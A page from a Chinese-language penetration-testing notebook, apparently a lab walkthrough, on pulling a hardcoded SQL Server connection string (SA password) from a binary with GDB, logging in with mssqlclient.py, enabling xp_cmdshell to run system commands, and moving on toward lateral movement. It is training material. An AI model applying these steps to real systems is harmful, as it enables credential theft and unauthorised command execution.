0xdfxyz
  • Penetration Testing Process
    • README.md
    • Whois
  • Nikto
  • Search Engine Discovery
  • FinalRecon
  • Nessus
  • 0_新手上路
    • 0_新手上路
  • 1_訊息收集
    • 服務枚舉
      • Page 6
      • Nmap
      • DNS
    • 應用枚舉
      • Page 6
    • A D枚舉
      • Page 6
    • web枚舉
      • Page 6
      • Web Fuzzing
      • Subdomain
  • 2_漏洞前準備
    • 反彈 Shell
    • 工具彙總
    • 字典生成
  • 3_漏洞利用
    • 應用漏洞利用
    • AD 攻擊
    • 二進位漏洞利用
    • Web漏洞利用
      • XSS
      • IDOR
      • Webshel​​l
      • File uploads
      • SSTI
      • LFI
      • SQL injection
      • XXE
      • HTTP Verb Tampering
      • Command Injection
    • 服務漏洞利用
      • CMS
        • Wordpress
        • Joolmla
        • Drupal
      • Servlet 容器/軟體開發
        • Jenkins
        • Tomcat
      • 基礎設施/網路監控工具
        • Splunk
        • PRTG Network Monitor
      • 客戶服務管理與配置管理
        • osTicket
        • Gitlab
      • 通用網關介面
        • 攻擊通用網關介面 (CGI) 應用程式 - Shellshock
      • 其他應用
        • ColdFusion
        • IIS Tilde
        • LDAP
      • 常見應用程式
        • Thick client(也稱為rich客戶端或fat客戶端
        • Web 批量分配漏洞 ( Ruby on Rails)
        • 攻擊連接到服務的應用程式(SSH)
  • 4_滲透
    • Linux 權限提升
    • Windows 權限提升
    • Windows + Linux 工具
  • 5_橫向移動
    • 工具
    • 跳板 Pivoting
    • AD 橫向移動
    • Linux 橫向移動
    • Windows 橫向移動
  • 6_NetExec
    • 常見模組
    • 命令執行
    • 漏洞掃描模組
    • 模組使用
    • 憑證轉儲
    • Kerberos 認證
    • LDAP RDP 枚舉
    • SMB 枚舉
由 GitBook 提供支持
在本页
  • 1. 發現點
  • 🚀 2. 測試Payload
  • 🎯 3. 設定斷點 & 讀取憑證
  • 🔗 4. 利用已知憑證
  • ⚡ 5. 連鎖漏洞(橫向移動 & 提權)

这有帮助吗?

  1. 3_漏洞利用
  2. 服務漏洞利用
  3. 常見應用程式

攻擊連接到服務的應用程式(SSH)

1. 發現點

  1. 使用 SSH 連接目標伺服器

    ssh htb-student@10.129.205.20
    • 帳密為:htb-student:HTB_@cademy_stdnt!

  2. 分析 octopus_checker 二進位檔案

    • 這是一個可能與資料庫或其他服務連接的應用程式

    • 目標是從該應用程式中提取連接資訊(Connection Strings)


🚀 2. 測試Payload

  1. 使用 GDB(GNU Debugger)載入 octopus_checker

    gdb ./octopus_checker
  2. 設定 Intel 反組譯格式,分析 main()

    set disassembly-flavor intel
    disas main
  3. 尋找 SQL 相關函數

    • 觀察 SQLAllocHandle、SQLSetEnvAttr、SQLDriverConnect 等 SQL 相關 API 呼叫

    • 這些 API 通常會包含數據庫連接資訊


🎯 3. 設定斷點 & 讀取憑證

  1. 找到 SQLDriverConnect() 函數

    b SQLDriverConnect
    run
  2. 觀察寄存器內容,提取連接字串

    RDX: "DRIVER={ODBC Driver 17 for SQL Server};SERVER=localhost,1401;UID=SA;PWD=N0tS3cr3t!;"
    • 成功獲取資料庫憑證

      • 使用者名稱(UID):SA

      • 密碼(PWD):N0tS3cr3t!

      • SQL Server 埠號:1401


🔗 4. 利用已知憑證

  1. 嘗試連接 SQL Server

    mssqlclient.py SA@10.129.205.20 -windows-auth
    • 輸入密碼:N0tS3cr3t!

    • 成功登入 SQL Server,取得資料庫存取權限

  2. 列舉 SQL Server 權限

    SELECT SYSTEM_USER;
    SELECT USER_NAME();
    • 確認當前權限,如為 dbo 或 sysadmin 則可進一步提權


⚡ 5. 連鎖漏洞(橫向移動 & 提權)

  1. 嘗試 XP_CMDshell 開啟 Shell

    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
    EXEC xp_cmdshell 'whoami';
    • 如果返回 nt authority\system,代表已取得系統權限

  2. 嘗試存取 Active Directory

    • 檢查 SQL Server 是否與 AD 整合

    SELECT name FROM master.sys.server_principals;
    • 嘗試橫向移動至其他系統


上一页Web 批量分配漏洞 ( Ruby on Rails)下一页Linux 權限提升

最后更新于2个月前

这有帮助吗?